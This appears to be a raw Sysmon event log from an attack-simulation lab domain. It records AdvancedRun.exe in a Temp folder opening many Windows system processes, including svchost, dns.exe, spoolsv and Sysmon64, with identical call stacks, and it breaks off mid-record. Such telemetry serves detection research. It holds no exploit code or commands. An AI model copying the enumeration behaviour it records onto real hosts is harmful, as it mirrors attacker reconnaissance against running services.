20:14:45.061{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3800-000000002702}2272C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075324Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.060{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3700-000000002702}1932C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075323Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.060{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3500-000000002702}1832C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075322Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.060{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3400-000000002702}2460C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075321Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.060{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3300-000000002702}2488C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075320Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.060{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3200-000000002702}1948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075319Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.059{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3100-000000002702}660C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004075318Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.059{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3000-000000002702}668C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075317Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.059{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-2F00-000000002702}2440C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075316Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.059{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF4-61EA-2D00-000000002702}2988C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075315Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.059{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF2-61EA-2C00-000000002702}2896C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075309Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.059{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF2-61EA-2B00-000000002702}2888C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075304Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.059{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF0-61EA-2900-000000002702}2760C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075301Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.059{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE8-61EA-2000-000000002702}1516C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 734700x80000000000000004075294Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.055{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\psapi.dll10.0.14393.0 (rs1_release.160715-1616)Process Status HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationPSAPIMD5=7B73FC5AD82AF0FB84212106455E0D48,SHA256=CF6A2C746B3A9B9294A41DE686ED35FC99BB6A8ABEA7DC6A81D15C67613B98D6trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000004075292Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.058{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1800-000000002702}1384C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004075286Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.058{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1700-000000002702}1300C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075285Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.058{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1600-000000002702}1264C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL 